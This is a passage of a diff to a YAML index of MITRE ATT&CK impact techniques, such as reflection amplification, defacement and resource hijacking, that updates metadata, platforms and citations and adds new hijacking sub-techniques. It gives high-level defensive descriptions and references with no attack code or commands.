+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -57634,17 +58395,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -57653,6 +58428,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -57668,17 +58444,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -57688,14 +58459,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -57704,28 +58476,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -57736,7 +58508,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57747,17 +58518,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57794,7 +58560,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -57815,7 +58582,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -57842,12 +58609,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -57880,7 +58713,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -57890,10 +58723,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -57956,7 +58788,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -57997,7 +58828,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -58018,9 +58849,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -58073,11 +59052,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -58100,6 +59078,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -58117,9 +59096,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -58145,9 +59125,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests: []
   T1486:
@@ -58234,7 +59213,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -58258,12 +59237,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58282,7 +59260,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -58299,18 +59276,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -58334,8 +59306,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58355,33 +59327,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
-        CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
-        due to the ease of deployment via exposed APIs and the potential for scaling
-        mining activities by deploying or compromising multiple containers within
-        an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
-        Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
-        malware identify then kill off processes for competing malware to ensure it’s
-        not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
-        may also use malware that leverages a system's network bandwidth as part of
-        a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
-        campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
-        they may engage in proxyjacking by selling use of the victims' network bandwidth
-        and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+        availability. \n\nResource hijacking may take a number of different forms.
+        For example, adversaries may:\n\n* Leverage compute resources in order to
+        mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+        SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+        quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+        types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+        2023)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -58392,7 +59353,7 @@ impact:
       - Magno Logan, @magnologan, Trend Micro
       - Vishwas Manral, McAfee
       - Yossi Weizman, Azure Defender Research Team
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Consider monitoring process resource usage to determine anomalous
         activity associated with malicious hijacking of computer resources such as
@@ -58409,8 +59370,11 @@ impact:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '1.5'
+      - SaaS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'File: File Creation'
@@ -58429,99 +59393,73 @@ impact:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1496
         external_id: T1496
-      - source_name: Unit 42 Hildegard Malware
-        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
-          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
-        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
-      - source_name: CloudSploit - Unused AWS Regions
-        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
-          Retrieved October 8, 2019.
-        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
-      - source_name: Sysdig Proxyjacking
-        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
-          Chat. Retrieved July 6, 2023.
-        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
-      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
-        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
-          17, 2019.
-        url: https://securelist.com/lazarus-under-the-hood/77908/
-      - source_name: Trend Micro Exposed Docker APIs
-        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
-          via Exposed APIs. Retrieved April 6, 2021.
-        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
-      - source_name: Trend Micro War of Crypto Miners
